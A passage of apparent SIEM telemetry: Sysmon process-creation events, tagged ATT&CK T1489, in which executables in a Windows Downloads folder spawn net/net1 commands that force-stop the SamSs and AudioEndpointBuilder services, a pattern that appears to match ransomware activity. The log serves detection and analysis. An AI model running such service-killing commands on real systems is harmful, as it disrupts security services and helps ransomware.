(WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: 
\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:24:02.103"",""processGuid"":""{df9fc3d3-d272-5ec7-0000-00100e654700}"",""processId"":""295780"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:42:10.693",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:58.807 
+ProcessGuid: {df9fc3d3-d26e-5ec7-0000-0010010c4700} +ProcessId: 3208 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:01.902503500Z"",""eventRecordID"":""1363"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:58.807\r\nProcessGuid: {df9fc3d3-d26e-5ec7-0000-0010010c4700}\r\nProcessId: 3208\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" 
/y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:58.807"",""processGuid"":""{df9fc3d3-d26e-5ec7-0000-0010010c4700}"",""processId"":""3208"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:41:56.298",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:48.189 +ProcessGuid: 
{df9fc3d3-d264-5ec7-0000-0010fbc54500} +ProcessId: 33396 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d263-5ec7-0000-0010eabf4500} +ParentProcessId: 236100 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:48.195685700Z"",""eventRecordID"":""1358"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:48.189\r\nProcessGuid: {df9fc3d3-d264-5ec7-0000-0010fbc54500}\r\nProcessId: 33396\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John 
Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d263-5ec7-0000-0010eabf4500}\r\nParentProcessId: 236100\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:48.189"",""processGuid"":""{df9fc3d3-d264-5ec7-0000-0010fbc54500}"",""processId"":""33396"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d263-5ec7-0000-0010eabf4500}"",""parentProcessId"":""236100"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:41:56.294",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:47.796 +ProcessGuid: {df9fc3d3-d263-5ec7-0000-00101bc14500} +ProcessId: 42812 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: 
Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d263-5ec7-0000-001048b64500} +ParentProcessId: 268680 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:47.864699000Z"",""eventRecordID"":""1357"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:47.796\r\nProcessGuid: {df9fc3d3-d263-5ec7-0000-00101bc14500}\r\nProcessId: 42812\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: 
Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d263-5ec7-0000-001048b64500}\r\nParentProcessId: 268680\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:47.796"",""processGuid"":""{df9fc3d3-d263-5ec7-0000-00101bc14500}"",""processId"":""42812"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d263-5ec7-0000-001048b64500}"",""parentProcessId"":""268680"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:41:56.290",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:47.724 +ProcessGuid: {df9fc3d3-d263-5ec7-0000-0010eabf4500} +ProcessId: 236100 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation 
+OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:47.770103900Z"",""eventRecordID"":""1356"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:47.724\r\nProcessGuid: {df9fc3d3-d263-5ec7-0000-0010eabf4500}\r\nProcessId: 236100\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:47.724"",""processGuid"":""{df9fc3d3-d263-5ec7-0000-0010eabf4500}"",""processId"":""236100"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:41:56.280",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:47.408 +ProcessGuid: {df9fc3d3-d263-5ec7-0000-001048b64500} +ProcessId: 268680 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: 
net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:47.414892100Z"",""eventRecordID"":""1355"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:47.408\r\nProcessGuid: {df9fc3d3-d263-5ec7-0000-001048b64500}\r\nProcessId: 268680\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:47.408"",""processGuid"":""{df9fc3d3-d263-5ec7-0000-001048b64500}"",""processId"":""268680"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:41:50.228",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:41.962 +ProcessGuid: {df9fc3d3-d25d-5ec7-0000-0010a1194500} +ProcessId: 236792 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation 
+OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d25d-5ec7-0000-0010870d4500} +ParentProcessId: 293852 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:41.972677100Z"",""eventRecordID"":""1353"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:41.962\r\nProcessGuid: {df9fc3d3-d25d-5ec7-0000-0010a1194500}\r\nProcessId: 236792\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d25d-5ec7-0000-0010870d4500}\r\nParentProcessId: 293852\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:41.962"",""processGuid"":""{df9fc3d3-d25d-5ec7-0000-0010a1194500}"",""processId"":""236792"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d25d-5ec7-0000-0010870d4500}"",""parentProcessId"":""293852"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:41:50.224",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:41.742 +ProcessGuid: {df9fc3d3-d25d-5ec7-0000-0010840f4500} +ProcessId: 293864 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop 
